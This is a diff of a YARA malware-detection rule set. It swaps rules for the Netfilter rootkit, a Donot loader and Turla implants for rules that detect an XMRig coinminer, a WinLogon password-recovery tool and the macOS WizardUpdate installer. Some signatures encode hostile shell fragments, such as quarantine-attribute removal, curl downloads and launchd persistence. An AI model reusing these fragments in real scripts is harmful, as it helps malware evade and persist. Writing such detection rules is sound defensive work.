-		$seq2 = { 8b 0d 10 32 40 00 0f 10 05 24 32 40 00 89 08 8b 0d 14 32 40 00 89 48 04 8b 0d 18 32 40 00 89 48 08 8b 0d 1c 32 40 00 89 48 0c 66 8b 0d 20 32 40 00 66 89 48 10 33 c9 a1 3c 32 40 00 0f 11 84 24 34 04 00 00 89 84 24 4c 04 00 00 f3 0f 7e 05 34 32 40 00 66 0f d6 84 24 44 04 00 00 0f 1f 40 00 0f b7 84 0c c8 0f 00 00 8d 49 02 66 89 84 0c 42 08 00 00 66 85 c0 75 e8 8d bc 24 44 08 00 00 83 c7 fe 66 8b 47 02 83 c7 02 66 85 c0 75 f4 b9 0a 00 00 00 be 40 32 40 00 f3 a5 b9 21 00 00 00 0f 10 05 58 33 40 00 66 a5 8d bc 24 54 0c 00 00 be 70 32 40 00 f3 a5 66 a5 0f 11 84 24 5c 0e 00 00 0f 10 05 78 ed 40 00 0f 11 84 24 6c 0e 00 00 0f 10 05 68 ed 40 00 0f 11 84 24 7c 0e 00 00 38 45 08 75 1f 8d 44 24 10 50 e8 23 fa ff ff 5f 5e 5b 8b 8c 24 c8 11 00 00 33 cc e8 1c 04 00 00 8b }
-		$seq3 = { 8b 84 b5 e4 d9 ff ff 85 c0 74 66 50 6a 00 68 ff ff 1f 00 ff 15 28 30 40 00 8b f8 85 ff 74 52 8d 85 dc d9 ff ff 50 6a 04 8d 85 d0 d9 ff ff 50 57 ff 15 64 30 40 00 85 c0 74 32 68 04 01 00 00 8d 85 ec fb ff ff 50 ff b5 d0 d9 ff ff 57 ff 15 34 30 40 00 8d 85 ec fb ff ff 68 f8 32 40 00 50 ff 15 38 31 40 00 83 c4 08 85 c0 74 21 57 ff d3 33 ff 8b 85 e0 d9 ff ff 46 c1 e8 02 8b cf 3b f0 0f 82 7b ff ff ff 85 c9 0f 84 43 01 00 00 68 04 01 00 00 8d 85 e4 f9 ff ff 50 6a 00 ff 15 3c 30 40 00 85 c0 0f 84 24 01 00 00 8d 85 f4 fd ff ff 50 68 04 01 00 00 ff 15 14 30 40 00 8d 85 f4 fd ff ff 50 6a 00 68 14 33 40 00 50 ff 15 60 30 40 00 6a 00 8d 85 f4 fd ff ff 50 8d 85 e4 f9 ff ff 50 ff 15 58 30 40 00 85 c0 0f 84 df 00 00 00 6a 00 6a 00 6a 03 6a 00 6a 00 68 00 00 00 c0 8d 85 f4 fd ff ff 50 ff 15 1c 30 40 00 8b f0 83 fe ff 0f 84 b8 00 00 00 6a 00 8d 85 d8 d9 ff ff 50 68 00 10 00 00 8d 85 e4 e9 ff ff 50 56 ff 15 78 30 40 00 85 }
+		$1 = "* COMMANDS:     'h' hashrate, 'p' pause, 'r' resume" fullword ascii
+		$2 = "--cpu-affinity       set process affinity to CPU core(s), mask 0x3 for cores 0 and 1" fullword ascii
+		$3 = "* THREADS:      %d, %s, av=%d, %sdonate=%d%%%s" fullword ascii
+		$4 = "--user-agent         set custom user-agent string for pool" fullword ascii
+		$5 = "-O, --userpass=U:P       username:password pair for mining server" fullword ascii
+		$6 = "--cpu-priority       set process priority (0 idle, 2 normal to 5 highest)" fullword ascii
+		$7 = "-p, --pass=PASSWORD      password for mining server" fullword ascii
+		$8 = "* VERSIONS:     XMRig/%s libuv/%s%s" fullword ascii
+		$9 = "-k, --keepalive          send keepalived for prevent timeout (need pool support)" fullword ascii
+		$10 = "--max-cpu-usage=N    maximum CPU usage for automatic threads mode (default 75)" fullword ascii
+		$11 = "--nicehash           enable nicehash/xmrig-proxy support" fullword ascii
+		$12 = "<!--The ID below indicates application support for Windows 10 -->" fullword ascii
+		$13 = "* CPU:          %s (%d) %sx64 %sAES-NI" fullword ascii
+		$14 = "-r, --retries=N          number of times to retry before switch to backup server (default: 5)" fullword ascii
+		$15 = "-B, --background         run the miner in the background" fullword ascii
+		$16 = "* API PORT:     %d" fullword ascii
+		$17 = "--api-access-token=T access token for API" fullword ascii
+		$18 = "-t, --threads=N          number of miner threads" fullword ascii
+		$19 = "--print-time=N       print hashrate report every N seconds" fullword ascii
+		$20 = "-u, --user=USERNAME      username for mining server" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $str* ) and 2 of ( $seq* )
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( 8 of them ) ) or ( all of them )
 }
-rule ARKBIRD_SOLG_MAL_Netfilter_May_2021_1 : FILE
+
+rule TRELLIX_ARC_Trojan_Coinminer : FILE
 {
 	meta:
-		description = "Detect Netfilter rootkit"
-		author = "Arkbird_SOLG"
-		id = "da333ed8-8cd3-5ae4-bce5-a43a227fdee3"
-		date = "2021-06-18"
-		modified = "2021-06-21"
-		reference = "https://twitter.com/struppigel/status/1405483373280235520"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_May_2021_1.yara#L1-L22"
-		license_url = "N/A"
-		logic_hash = "f219981af907f74e4d95f768d99b7fd877c8bfb00587d198a4b0e2c521c744e1"
+		description = "Rule to detect Coinminer malware"
+		author = "Trellix ATR"
+		id = "ec1f4fb7-bce3-5d5b-bbff-50f9bfc90298"
+		date = "2021-07-22"
+		modified = "2022-01-19"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/miners/Trojan_CoinMiner.yar#L3-L23"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "0d9d502eb0a54f90044f42f8ce485a2df6814064172cb7bf006a8c8a51976acd"
 		score = 75
-		quality = 73
+		quality = 70
 		tags = "FILE"
-		hash1 = "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0"
-		hash2 = "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870"
-		hash3 = "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe"
-		tlp = "White"
-		adversary = "Chinese APT Group"
+		version = "v1"
+		hash1 = "3bdac08131ba5138bcb5abaf781d6dc7421272ce926bc37fa27ca3eeddcec3c2"
+		hash2 = "d60766c4e6e77de0818e59f687810f54a4e08505561a6bcc93c4180adb0f67e7"
 
 	strings:
-		$seq1 = { 48 8b 05 a9 57 ff ff 45 33 c9 49 b8 32 a2 df 2d 99 2b 00 00 48 85 c0 74 05 49 3b c0 75 38 0f 31 48 c1 e2 20 48 8d 0d 85 57 ff ff 48 0b c2 48 33 c1 48 89 05 78 57 ff ff 66 44 89 0d 76 57 ff ff 48 8b 05 69 57 ff ff 48 85 c0 75 0a 49 8b c0 48 89 05 5a 57 ff ff 48 f7 d0 48 89 05 58 57 }
-		$seq2 = { 48 83 ec 38 48 83 64 24 20 00 48 8d 05 83 4c 00 00 48 8d 15 24 d1 00 00 48 89 44 24 28 48 8d 4c 24 20 e8 4d 05 00 00 85 c0 78 16 4c 8d 05 22 d1 00 00 83 ca ff 48 8d 0d 00 d1 00 00 e8 39 05 00 00 48 83 c4 }
-		$seq3 = { 45 33 c0 48 8d 4c 24 40 41 8d 50 01 ff 15 5d 62 00 00 c6 84 24 88 00 00 00 01 48 8d 84 24 88 00 00 00 48 89 46 18 48 8d 0d e2 fe ff ff 48 89 9e c0 00 00 00 48 8d 44 24 40 48 89 46 50 48 8d 44 24 30 48 89 46 48 65 48 8b 04 25 88 01 00 00 48 89 86 98 00 00 00 48 8b 86 b8 00 00 00 40 88 7e 40 c6 40 b8 06 4c 89 78 e0 48 89 58 e8 c7 40 c0 01 00 00 00 c7 40 c8 0d 00 00 00 48 89 58 d0 48 8b 86 b8 00 00 00 48 89 48 f0 48 8d 4c 24 40 48 89 48 f8 c6 40 bb e0 48 8b 43 28 48 85 c0 74 2f 48 8b 48 10 48 85 c9 74 07 48 21 78 10 4c 8b f1 48 8b 08 48 85 c9 74 06 48 21 38 48 8b e9 48 8b 48 08 48 85 c9 74 08 48 83 60 08 00 48 8b f9 48 8b d6 49 8b cf ff 15 74 61 00 00 3d 03 01 00 00 75 19 48 83 64 24 20 00 48 8d 4c 24 40 41 b1 01 45 33 c0 33 d2 ff 15 64 61 00 00 48 8b 43 28 48 85 c0 74 1a 4d }
-		$seq4 = { 8b 84 24 80 00 00 00 48 8d 54 24 38 48 8b 4c 24 30 44 8b ce 89 44 24 28 45 33 c0 48 89 7c 24 20 ff 15 66 2e 00 00 48 8b 4c 24 30 8b d8 ff 15 49 2e 00 00 48 8b 4c 24 30 ff 15 26 2d 00 00 8b }
-		$s1 = "%sc=%s" fullword ascii
-		$s2 = { 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 }
-		$s3 = "NETIO.SYS" fullword ascii
+		$seq0 = { df 75 ab 7b 80 bf 83 c1 48 b3 18 74 70 01 24 5c }
+		$seq1 = { 08 37 4e 6e 0f 50 0b 11 d0 98 0f a8 b8 27 47 4e }
+		$seq2 = { bf 17 5a 08 09 ab 80 2f a1 b0 b1 da 47 9f e1 61 }
+		$seq3 = { 53 36 34 b2 94 01 cc 05 8c 36 aa 8a 07 ff 06 1f }
+		$seq4 = { 25 30 ae c4 44 d1 97 82 a5 06 05 63 07 02 28 3a }
+		$seq5 = { 01 69 8e 1c 39 7b 11 56 38 0f 43 c8 5f a8 62 d0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "e4290fa6afc89d56616f34ebbd0b1f2c" and 3 of ( $seq* ) )
 }
-rule ARKBIRD_SOLG_MAL_Netfilter_Dropper_Jun_2021_1 : FILE
+/*
+ * YARA Rule Set
+ * Repository Name: Arkbird SOLG
+ * Repository: https://github.com/StrangerealIntel/DailyIOC
+ * Retrieval Date: 2026-03-01
+ * Git Commit: a873ff1298c43705e9c67286f3014f4300dd04f7
+ * Number of Rules: 215
+ * Skipped: 0 (age), 11 (quality), 0 (score), 0 (importance)
+ *
+ *
+ * LICENSE
+ *
+ * NO LICENSE SET
+ */
+rule ARKBIRD_SOLG_SP_Vault7_SIG_F_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect the dropper of Netfilter rootkit"
+		description = "Detect open-source PasswordReminder recovery tools used by Chinese APT in the Past"
 		author = "Arkbird_SOLG"
-		id = "5e67c99c-6b08-5190-9c8a-55086c20923e"
-		date = "2020-06-18"
-		modified = "2021-06-18"
-		reference = "https://twitter.com/struppigel/status/1405483373280235520"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_Dropper_Jun_2021_1.yara#L1-L20"
+		id = "0b65e333-16e2-57c3-84f0-5cd24c9d9593"
+		date = "2020-11-30"
+		modified = "2020-11-30"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-30/SP_Vault7_SIG_F_Nov_2020_1.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "66e96304e097a0f6cd99cf77b20f61b8a0bcceaf8685a336c039a80947a08f78"
+		logic_hash = "b03ffb433491b532d891f29aeb5b33c6578067f2f05845514a7bdc1e50f88a10"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac"
-		hash2 = "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9"
-		hash3 = "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540"
-		tlp = "White"
-		adversary = "Chinese APT Group"
+		hash1 = "e6e17f2b2ce0ae07cf48654156b79ee90d330961456f731e84c94f50fe34f802"
+		hash2 = "c224ee5bef42a45e84e0d5a409d8b4c3842b2a7ac3fe5006ee795e64e0778e6e"
 
 	strings:
-		$seq1 = { b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fe ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 00 00 88 85 dc fd ff ff b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fd ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 50 00 50 e8 ?? 0d 00 00 83 c4 04 89 85 d8 fd ff ff 8b 85 d8 fd ff ff 89 85 d4 fd ff ff b8 00 00 50 00 50 b8 00 00 00 00 50 8b 85 d8 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c 8b 45 0c 8b 8d d8 fd ff ff 89 08 b8 3c 00 00 00 50 b8 00 00 00 00 50 8d 85 98 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c b8 3c 00 00 00 89 85 98 fd ff ff 8d 85 98 fd ff ff 83 c0 10 8d 8d dc fe ff ff 89 08 8d 85 98 fd ff ff 83 c0 14 b9 00 01 00 00 89 08 8d 85 98 fd ff ff 83 c0 2c 8d 8d dc fd ff ff 89 08 8d 85 98 fd ff ff 83 c0 30 b9 00 01 00 00 89 08 b8 0a 31 40 00 50 e8 ?? 0c 00 00 89 85 94 fd ff ff b8 16 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 fc b8 28 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 f8 b8 36 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f4 b8 47 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f0 b8 58 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 ec b8 69 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e8 b8 7a 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e4 b8 8e 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e0 8b 45 08 50 e8 ?? 0b 00 00 83 c4 04 8d 8d 98 fd ff ff 51 b9 00 00 00 00 51 50 8b 45 08 50 8b 45 fc ff d0 85 }
-		$seq2 = { b8 00 00 00 00 89 85 90 fd ff ff b8 00 00 00 00 89 85 8c fd ff ff b8 00 00 00 00 89 85 88 fd ff ff b8 00 00 00 00 89 85 84 fd ff ff b8 04 00 00 00 89 85 80 fd ff ff b8 00 00 00 00 88 85 7f f5 ff ff b8 00 08 00 00 50 b8 00 00 00 00 50 8d 85 80 f5 ff ff 50 e8 ?? 0b 00 00 83 c4 0c b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 9d 31 40 00 50 8b 45 f8 ff d0 89 85 90 fd ff ff 8b 85 }
-		$s1 = "%s\\netfilter.sys" fullword ascii
-		$s2 = "SYSTEM\\CurrentControlSet\\Services\\netfilter" fullword ascii
-		$s3 = "\\\\.\\netfilter" fullword ascii
+		$dbg1 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 57 69 6e 4c 6f 67 6f 6e 20 6f 72 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 20 4e 57 47 49 4e 41 2e 44 4c 4c 2e 0a }
+		$dbg2 = { 54 68 65 20 65 6e 63 6f 64 65 64 20 70 61 73 73 77 6f 72 64 20 69 73 20 66 6f 75 6e 64 20 61 74 20 30 78 25 38 2e 38 6c 78 20 61 6e 64 20 68 61 73 20 61 20 6c 65 6e 67 74 68 20 6f 66 20 25 64 2e 0a }
+		$dbg3 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 74 68 65 20 70 61 73 73 77 6f 72 64 20 69 6e 20 6d 65 6d 6f 72 79 2e 0a }
+		$dbg4 = { 20 55 73 61 67 65 3a 20 25 73 20 44 6f 6d 61 69 6e 4e 61 6d 65 20 55 73 65 72 4e 61 6d 65 20 50 49 44 2d 6f 66 2d 57 69 6e 4c 6f 67 6f 6e 0a 0a }
+		$dbg5 = { 54 68 65 20 6c 6f 67 6f 6e 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 69 73 3a 20 25 53 2f 25 53 2f 25 53 2e 0a }
+		$dbg6 = { 54 68 65 20 57 69 6e 4c 6f 67 6f 6e 20 70 72 6f 63 65 73 73 20 69 64 20 69 73 20 25 64 20 28 30 78 25 38 2e 38 6c 78 29 2e 0a }
+		$dbg7 = { 59 6f 75 20 6c 6f 67 67 65 64 20 6f 6e 20 61 74 20 25 64 2f 25 64 2f 25 64 20 25 64 3a 25 64 3a 25 64 0a }
+		$dbg8 = { 54 68 65 20 68 61 73 68 20 62 79 74 65 20 69 73 3a 20 30 78 25 32 2e 32 78 2e 0a }
+		$dbg9 = { 53 55 56 57 68 14 ?? 40 00 e8 17 0c 00 00 8b 6c 24 1c [1-4] 45 00 50 68 e0 ?? 40 00 e8 ?? ?? 00 00 83 c4 ?? e8 ?? 02 00 00 85 c0 75 1d e8 ?? 02 00 00 85 c0 75 14 68 b4 ?? 40 00 e8 ?? 0b 00 00 83 c4 04 33 c0 5f 5e 5d 5b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( all of ( $seq* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x4d5a and filesize > 50KB and 6 of them
 }
-rule ARKBIRD_SOLG_APT_MAL_Donot_Loader_June_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_2 : FILE
 {
 	meta:
-		description = "Detect loader malware used by APT Donot for drops the final stage"
+		description = "Detect a structure like the bash of WizardUpdate installer on OSX system"
 		author = "Arkbird_SOLG"
-		id = "ec4cac12-529f-56d2-bbc0-5fe30424b10b"
-		date = "2020-06-22"
-		modified = "2020-06-22"
-		reference = "https://twitter.com/ccxsaber/status/1274978583463649281"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-22/APT_MAL_Donot_Loader_June_2020_1.yar#L3-L22"
+		id = "3e48c2fa-10f4-5152-90e6-f5f8cc507103"
+		date = "2021-10-22"
+		modified = "2021-10-23"
+		reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_2.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "986deffd48c1fb707948b00e1e200fa6538d4c73a32ab89f5119403f9bf0d734"
+		logic_hash = "99d3323e3c155be040fef3beea0a55aec9bd3178df822d5fd6530864186446ed"
 		score = 75
-		quality = 75
+		quality = 67
 		tags = "FILE"
-		hash1 = "1ff33d1c630db0a0b8b27423f32d15cc9ef867349ac71840aed47c90c526bb6b"
+		hash1 = "eafacc44666901a5ea3c81a128e5dd88d0968a400d74ef1da5c2c05dc6dd7a39"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$s1 = "C:\\Users\\spartan\\Documents\\Visual Studio 2010\\new projects\\frontend\\Release\\test.pdb" fullword ascii
-		$s2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Edg/81.0.416.68" fullword ascii
-		$s3 = "bbLorkybbYngxkjbb]khbbmgvjgz4k~k" fullword ascii
-		$s4 = "8&8-8X8.959?9Q9h9v9|9" fullword ascii
-		$s5 = "0$0h4h5l5p5t5x5|5" fullword ascii
-		$s6 = "?&?+?1?7?M?T?g?z?" fullword ascii
-		$s7 = "12.02.1245" fullword ascii
-		$s8 = ">>?C?L?[?~?" fullword ascii
-		$s9 = "6*6=6P6b6" fullword ascii
+		$s1 = { 24 28 65 76 61 6c 20 65 63 68 6f 20 7e 24 28 65 63 68 6f 20 24 55 53 45 52 29 29 }
+		$s2 = { 69 66 20 5b 20 21 20 2d 66 20 22 24 [5-15] 22 20 5d 3b 20 74 68 65 6e }
+		$s3 = { 63 75 72 6c 20 2d 2d 72 65 74 72 79 20 [2-3] 2d 66 20 22 }
+		$s4 = { 78 61 74 74 72 20 2d 72 20 2d 64 20 63 6f 6d 2e 61 70 70 6c 65 2e 71 75 61 72 61 6e 74 69 6e 65 }
+		$s5 = { 6c 61 75 6e 63 68 63 74 6c 20 6c 6f 61 64 20 2d 77 }
+		$s6 = { 63 68 6f 77 6e 20 2d 52 20 24 55 53 45 52 }
+		$s7 = { 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 20 65 6e 63 6f 64 69 6e 67 3d 5c 22 55 54 46 2d 38 5c 22 3f 3e 0a 09 3c 21 44 4f 43 54 59 50 45 20 70 6c 69 73 74 20 50 55 42 4c 49 43 20 5c 22 2d 2f 2f 41 70 70 6c 65 2f 2f 44 54 44 20 50 4c 49 53 54 20 31 2e 30 2f 2f 45 4e 5c 22 20 5c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 70 6c 65 2e 63 6f 6d 2f 44 54 44 73 2f 50 72 6f 70 65 72 74 79 4c 69 73 74 2d 31 2e 30 2e 64 74 64 5c 22 3e 0a 09 3c 70 6c 69 73 74 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 3e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 7 of them
+		filesize > 2KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Turla_Bigboss_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detects new BigBoss implants (SilentMoon/GoldenSky)"
+		description = "Detect WizardUpdate installer on OSX system"
 		author = "Arkbird_SOLG"
-		id = "6f6c8d1e-f2c7-5f08-b1dc-ce726c6d89be"
-		date = "2021-04-06"
-		modified = "2021-07-17"
-		reference = "https://twitter.com/DrunkBinary/status/1304086230540390400"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-17/BigBoss/APT_Turla_BigBoss_Apr_2021_1.yara#L1-L21"
+		id = "50974725-6b45-5f2f-aa76-ae73dc752873"
+		date = "2021-10-22"
+		modified = "2021-10-23"
+		reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "ce0ffdad9eecb79128b6c08c87914f356c86ac631655c76905a06d953add3998"
+		logic_hash = "b25145a9aa33c9518e5e0847b50faa8b67d65078ddfbb66de49196a17ddd3137"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		hash1 = "94421ccb97b784c43d92c4b1438481eee9c907db6b13f6cfc4b86a6bb057ddcd"
-		hash2 = "67bfa585ace8df20deb1d8a05bd4acf2c84c6fa0966276b3ea7607056abe25bb"
-		hash3 = "6ca0b4efe077fe05b2ae871bf50133c706c7090a54d2c3536a6c86ff454caa9a"
+		hash1 = "939cebc99a50989ffbdbb2a6727b914fc9b2382589b4075a9fd3857e99a8c92a3"
+		hash2 = "c5017798275f054ae96c69f5dd0b378924c6504a70c399279bbf7f33d990d45b"
+		hash3 = "7067e6a69a8f5fdbabfb00d03320cfc2f3584a83304cbeeca7e8edc3d57bbbd4"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$s1 = { 55 8b ec a1 [2] 40 00 83 ec 3c 50 6a 3c 8d 4d c4 51 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 78 ?? 40 00 8d 45 c4 8d 50 02 8d 49 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b c2 d1 f8 75 1c 8b 15 [2] 40 00 52 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 [2] 40 00 8b e5 }
-		$s2 = { 5c 00 5c 00 2e 00 5c 00 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 50 00 49 00 50 00 45 00 5c }
-		$s3 = { 5c 5c 25 73 5c 70 69 70 65 5c 25 73 }
-		$s4 = { 5c 00 69 00 6e 00 66 00 5c 00 00 00 [4-16] 2e 00 69 00 6e 00 66 }
-		$s5 = "%d blocks, %d sorted, %d scanned" ascii fullword
-		$s6 = "REMOTE_NS:ERROR:%d" ascii fullword
-		$s7 = { 5c 5c 25 73 5c 69 70 63 24 }
-		$s8 = { 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 6c 00 61 00 6e 00 6d 00 61 00 6e 00 73 00 65 00 72 00 76 00 65 00 72 00 5c 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 73 00 00 00 4e 00 75 00 6c 00 6c 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 50 00 69 00 70 00 65 00 73 00 00 00 00 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4c 00 53 00 41 00 00 00 00 00 52 00 65 00 73 00 74 00 72 00 69 00 63 00 74 00 41 00 6e 00 6f 00 6e 00 79 00 6d 00 6f 00 75 00 73 }
+		$s1 = { 48 89 e5 48 83 ec 70 48 89 7d f0 48 c7 45 e0 00 00 00 00 b8 01 00 00 00 48 89 c7 48 89 c6 e8 b8 3b 00 00 31 c9 89 cf 48 89 45 d8 48 c7 45 d0 00 00 00 00 e8 a9 3b 00 00 48 8b 7d f0 48 8d 35 d4 3f 00 00 89 45 cc e8 ba 3b 00 00 48 89 45 e8 48 83 7d e8 00 0f 85 0d 00 00 00 48 c7 45 f8 00 00 00 00 e9 cd 00 00 00 e9 00 00 00 00 48 8b 55 e8 48 8d 7d e0 48 8d 75 d0 e8 70 3b 00 00 48 83 f8 ff 0f 84 9c 00 00 00 48 8b 7d d8 48 8b 45 d8 48 89 7d c0 48 89 c7 e8 76 3b 00 00 48 8b 7d e0 48 89 45 b8 e8 69 3b 00 00 48 8b 4d b8 48 01 c1 48 81 c1 01 00 00 00 48 8b 7d c0 48 89 ce e8 49 3b 00 00 48 89 45 d8 48 8b 45 d8 48 8b 7d d8 48 89 45 b0 e8 3a 3b 00 00 48 8b 4d b0 48 01 c1 48 8b 75 e0 48 8b 7d e0 48 89 4d a8 48 89 75 a0 e8 1e 3b 00 00 48 05 01 00 00 00 48 8b 7d a8 48 8b 75 a0 48 89 c2 e8 0e 3b 00 00 48 8b 7d e0 48 89 45 98 e8 d1 3a 00 00 48 c7 45 }
+		$s2 = { 48 89 e5 48 81 ec 80 01 00 00 48 89 f8 48 8b 0d 7b 31 00 00 48 8b 09 48 89 4d f8 48 89 bd e8 fe ff ff c6 85 e7 fe ff ff 00 48 89 bd b8 fe ff ff 48 89 b5 b0 fe ff ff 48 89 85 a8 fe ff ff e8 9c 01 00 00 c7 85 d4 fe ff ff 00 01 00 00 48 8d 35 0a 2e 00 00 48 8b bd b0 fe ff ff e8 df 28 00 00 e9 00 00 00 00 48 8b bd b0 fe ff ff e8 8e 01 00 00 48 8d 35 ec 2d 00 00 48 89 c7 e8 5b 29 00 00 48 89 85 a0 fe ff ff e9 00 00 00 00 48 8b 85 a0 fe ff ff 48 89 85 d8 fe ff ff 48 83 bd d8 fe ff ff 00 0f 84 c4 00 00 00 e9 00 00 00 00 48 8b bd d8 fe ff ff e8 04 29 00 00 89 85 9c fe ff ff e9 00 00 00 00 8b 85 9c fe ff ff 83 f8 00 0f 95 c1 80 f1 ff f6 c1 01 0f 85 05 00 00 00 e9 75 00 00 00 48 8b 95 d8 fe ff ff 48 8d bd f0 fe ff ff be 00 01 00 00 e8 ca 28 00 00 48 89 85 90 fe ff ff e9 00 00 00 00 48 8b 85 90 fe ff ff 48 83 f8 00 0f 84 3b 00 00 00 48 8d b5 f0 fe ff ff 48 8b bd b8 fe ff ff }
+		$s3 = "11101000010110101110100011010010110110101100101011011110111010101110100001000000011100100110000001100000010000000101101010011000010000000100010011010000111010001110100011100000111001100111010001011110010111101101101"
+		$s4 = { 48 8b bd d8 fe ff ff e8 73 28 00 00 e9 00 00 00 00 e9 00 00 00 00 c6 85 e7 fe ff ff 01 f6 85 e7 fe ff ff 01 0f 85 0c 00 00 00 48 8b bd b8 fe ff ff e8 cb 27 00 00 48 8b 05 fc 2f 00 00 48 8b 00 48 8b 4d f8 48 39 c8 0f 85 32 00 00 00 48 8b 85 a8 fe ff ff 48 81 c4 80 01 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 7 of ( $s* )
+		uint32( 0 ) == 0xFEEDFACF and filesize > 50KB and ( ( $s1 and $s3 ) or ( $s2 and $s4 ) )
 }
-rule ARKBIRD_SOLG_APT_Donot_Downloader_May_2021_1 : FILE
